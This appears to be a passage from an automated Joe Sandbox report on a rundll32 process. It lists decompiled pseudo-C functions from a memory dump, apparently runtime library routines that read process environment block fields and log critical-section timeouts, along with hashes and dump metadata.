                                                                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                            • Instruction Fuzzy Hash: 3CC08C32080248BBCB126E41DC00F027B29E7A0B60F000020B7040A5608532ED60E988
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E046036CC(void* __ecx) {
                                                                                            
                                                                                            				if(__ecx > 0x7fffffff) {
                                                                                            					return 0;
                                                                                            				} else {
                                                                                            					return L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                            				}
                                                                                            			}




                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                            • Instruction ID: 7f3fd94597dc36f5d89acd673de075f8d45c6afe40d05012b832869be9058730
                                                                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                            • Instruction Fuzzy Hash: ACC02B70260440FBEB191F30CD00F167254F760B22F6403547320496F0F528BC00E500
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045E76E2(void* __ecx) {
                                                                                            				void* _t5;
                                                                                            
                                                                                            				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                                                            					return L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                            				}
                                                                                            				return _t5;
                                                                                            			}




                                                                                            0x045e76e4
                                                                                            0x00000000
                                                                                            0x045e76f8
                                                                                            0x045e76fd

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                            • Instruction ID: 02c0eae911d4d59d2f178c2c7e5571dfd12e9a410397328dd331f1f950006b8a
                                                                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                            • Instruction Fuzzy Hash: 71C08C701525809AEB2E6F09CE20B303650BB0C74CF48019CAA21094A1C368B803E208
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045F7D50() {
                                                                                            				intOrPtr* _t3;
                                                                                            
                                                                                            				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                            				if(_t3 != 0) {
                                                                                            					return  *_t3;
                                                                                            				} else {
                                                                                            					return _t3;
                                                                                            				}
                                                                                            			}





                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                            • Instruction ID: 56c3d00746460d89c8604758b864390545c8b0d405b5dabe9d7795e6faa56b26
                                                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                            • Instruction Fuzzy Hash: 5BB092343019409FCF16DF18C580B1533E4BB48A40B8400D0E400CBA20D229E8009900
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E04602ACB() {
                                                                                            				void* _t5;
                                                                                            
                                                                                            				return E045EEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                            			}




                                                                                            0x04602adc

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                            • Instruction ID: 7d3343ff42b4766a3711f9b4d9ecc9d2f76dec64e1ec8f57c555168be516c98c
                                                                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                            • Instruction Fuzzy Hash: 65B01233C20441CFCF06EF40C610B297335FB40750F054490900127930C228BC01DB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 53%
                                                                                            			E0466FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                            				void* _t7;
                                                                                            				intOrPtr _t9;
                                                                                            				intOrPtr _t10;
                                                                                            				intOrPtr* _t12;
                                                                                            				intOrPtr* _t13;
                                                                                            				intOrPtr _t14;
                                                                                            				intOrPtr* _t15;
                                                                                            
                                                                                            				_t13 = __edx;
                                                                                            				_push(_a4);
                                                                                            				_t14 =  *[fs:0x18];
                                                                                            				_t15 = _t12;
                                                                                            				_t7 = E0461CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                            				_push(_t13);
                                                                                            				E04665720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                            				_t9 =  *_t15;
                                                                                            				if(_t9 == 0xffffffff) {
                                                                                            					_t10 = 0;
                                                                                            				} else {
                                                                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                            				}
                                                                                            				_push(_t10);
                                                                                            				_push(_t15);
                                                                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                            				return E04665720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                            			}











                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0466FDFA
                                                                                            Strings
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0466FE01
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0466FE2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                            • API String ID: 885266447-3903918235
                                                                                            • Opcode ID: b958b8d0f738640300b0fd622b7f81e49b54128a0e7cdf41be068df8172342fd
                                                                                            • Instruction ID: dc15cf1775478a06eb1203a7fa925f76baeb2337e23f9eca21a290da340e242b
                                                                                            • Opcode Fuzzy Hash: b958b8d0f738640300b0fd622b7f81e49b54128a0e7cdf41be068df8172342fd
                                                                                            • Instruction Fuzzy Hash: 5DF0F632640601BFE6241A85EC02F23BF5AEB44730F140318F629565E1FA62F830D6F8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%